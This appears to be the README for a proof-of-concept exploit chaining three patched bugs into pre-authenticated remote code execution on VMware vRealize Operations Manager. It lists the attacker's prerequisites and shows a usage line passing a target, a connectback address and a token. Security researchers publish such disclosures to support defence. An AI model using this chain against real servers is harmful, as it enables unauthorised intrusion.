This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901.
Steven Seeley of Qihoo 360 Vulnerability Research Institute
The exploit was tested against 8.6.3.19682901 using the file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) but it has known to work against other older versions as well.
-
This exploit chains three vulnerabilities that have been patched. More details can be found in the blog post:
-
This exploit will require the attacker to supply:
- A valid dashboardlink token that will be used to bypass authentication.
- Their own SMTP server settings, this is to ensure that exploitation works.
- A valid Pak file that is signed by VMWare such as
APUAT-8.5.0.18176777.pak.
-
There is alot of moving parts to this exploit, hopefully I engineered it right so it works on the first shot.
-
The exploit takes on average ~1m34.142s to complete (tested 5 times), I tried to engineer this to be faster, but it's within an allocated time for a competition ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
